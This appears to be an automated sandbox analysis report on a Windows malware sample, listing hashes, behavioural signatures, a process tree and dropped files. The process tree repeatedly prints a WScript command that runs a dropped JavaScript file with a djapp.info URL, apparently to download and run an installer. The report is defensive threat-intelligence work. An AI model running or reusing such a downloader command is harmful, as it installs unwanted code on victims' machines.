Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    05/06/2024, 09:22

General

  • Target

    97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    97baf34f347bef8b8d2984540ba5109c

  • SHA1

    8f4b528a2c171a0459723db7fc487cdb7633e513

  • SHA256

    b08ec6b859357b2217ef4cb989a96bb2de9b7635ce2e835fd0e5ab26cdd4eba9

  • SHA512

    daaf9b41c20101bb06f6bcd819617cfbf08d61f4b7b7fb2220d9d7aedf04ee0bd576bd5a83670aaac9d56ad3820fbcb4ef0a24b8659c682aef8118267e4119e8

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3n:/7BSH8zUB+nGESaaRvoB7FJNndnW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\97baf34f347bef8b8d2984540ba5109c_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
      2⤵
      • Blocklisted process makes network request
      PID:2884
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
      2⤵
      • Blocklisted process makes network request
      PID:2680
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
      2⤵
      • Blocklisted process makes network request
      PID:1772
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
      2⤵
      • Blocklisted process makes network request
      PID:2216
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf31F9.js" http://www.djapp.info/?domain=qmSDoVtdyN.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf31F9.exe
      2⤵
      • Blocklisted process makes network request
      PID:1472

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          1KB

          MD5

          7357fa5c905c3d2772e5e992523203bb

          SHA1

          7fe955c95b9a93bbabb4aae0c81ad201b3e09130

          SHA256

          53c909e9d2a2cd0414ab8d6552c28fb6a2e1e425f38dbd11307aff4c8ed1c04e

          SHA512

          c7303f7be59538b6f26143da757d50f35c5ab973f401fec8ac4d1a9d9e3d30116c0b155674c9e84b41fb14e7adea88a52c8675c9c79e9e840828a35320143760

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          724B

          MD5

          8202a1cd02e7d69597995cabbe881a12

          SHA1

          8858d9d934b7aa9330ee73de6c476acf19929ff6

          SHA256

          58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

          SHA512

          97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          410B

          MD5

          b9a18bef67dc155fa1f038655e1970f8

          SHA1

          4c68555e2792eeff54b459e11ba9796060897e63

          SHA256

          754b298d8fc905846d9afcb874f5eacabe50c0d250338c6505017da7a3ea2e74

          SHA512

          696f3ae25a48b3dea9e47a27834443587440c6e14835be7bab00a8b482d6760dc5ba8ba28dd5bbcaffde849dbce3d35160c28350e3264518c0db3a677f931b67

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          23e770bc37b8d309baf248c546d5c679

          SHA1

          39e540d049578d2529abf1030ecdb1d1e7776d9c

          SHA256

          e79acb6021382c412d668159d61999800511fcc4bf55c133707c6898cf9433c6

          SHA512

          f1c62cdbc7b34312cb79dd8605d0636e2ee82913044822eef5d0c5f311abfbff3fd14c8513b8c603b2a80b0bce2d2b218edd794a14ee606f29d2c25964556d1f

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          392B

          MD5

          9ce61537dbd3e670361858265f86fa96

          SHA1

          fe6e042bee1c08d5f5a407a27c2e0c9dd44ef345

          SHA256

          574ddcf4916fb811930b3db5a07769b7eb9b84a5c0731bbc544f2f670eabea47

          SHA512

          def49b9cc18ed34a04a82f493ff26c421cae3360e9afa8e2fa3d85342a15aa9f00ca13feb025829e82276f8ce5aeeaa9db31ccbb886d2f4540116c2629fbbf9c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

          Filesize

          40KB

          MD5

          ccbefb6af868dc21aec59e01d512bb08

          SHA1

          5ca723bde1032bc3e82d4fdc7e7b25201d8c2a95

          SHA256

          e8c132a34a7fd9c6dba4c3b20e786d5040bb737fab78ca6b05bbbadee29d8ee4

          SHA512

          a07e0808f84027d656d8b1171d35bcf5a277ed5993f89a8c512cffb7fe16538cb6bab95686a375500978e72b48e50d18bad2fe0c4b8759929c753413f9763381

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

          Filesize

          6KB

          MD5

          98c2e848e17ba6a01256aebacd1d0aed

          SHA1

          b33dd87861fc7426a207f2f901219f7478e69085

          SHA256

          b1332380d039f44237006e753f5a29c0c89f4f6e17799009ebb9af8d0d7798f7

          SHA512

          e3f58cd2ec3b45d750346175bf91ac5faec1fadbe4baae38c828d52fc19cc3a157e29a2321eae542545ad1911e2f61e21aff6893633b4f973db29cae7d70838b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

          Filesize

          40KB

          MD5

          dfc193b647ad03215b1023565285d10c

          SHA1

          b363a9e9bdd0ca66a497bb5018858c263cfafa1f

          SHA256

          ad4f47e30de3e2c1323ff524634bb4a2b959a240e329303afde3387a50eedb0d

          SHA512

          bb7effe231b64c3efcef8f082814cfe02eda31e33714c6f0251b366a806efbb519e109741f47496337a4769c86147166933eb7fa58a40d2645ac524e24bce6e8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

          Filesize

          6KB

          MD5

          c2bf2ba6cbcfca7c2c37c728335579f5

          SHA1

          773ab87b5ab250780a141df7f9897b7b3eff0eeb

          SHA256

          d455e284a40e4ff4c98dbf4e00d857b70c6f8cf64b6e02755010c60c744f9473

          SHA512

          40cedb626838c849c07ea07938f462874ce0bf59b85383333bb8c3cf6e2fff795f01106f643f1c9b6b7a56ca43aa46a8cc99b2eb2695a9511d20422aed2984ff

        • C:\Users\Admin\AppData\Local\Temp\Cab6162.tmp

          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        • C:\Users\Admin\AppData\Local\Temp\Tar79E2.tmp

          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        • C:\Users\Admin\AppData\Local\Temp\fuf31F9.js

          Filesize

          3KB

          MD5

          3813cab188d1de6f92f8b82c2059991b

          SHA1

          4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

          SHA256

          a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

          SHA512

          83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VD114O5C.txt

          Filesize

          177B

          MD5

          1eff8df69cc380cb9bb040dd77d3dd38

          SHA1

          57348b55825f809e81496547f7f03a746a10e49f

          SHA256

          b0dde1b5cf3347c4ca1c68f86491ace19eb775cde060f7ad6980f32424960795

          SHA512

          84ddf851cee8138d8150f9f19965c532b1b08781144b562cdcbde31ddfc71cdd401d64c1b67bf2a6ade328a1dce6581922daf4f31e65e25bda0b917eb313679f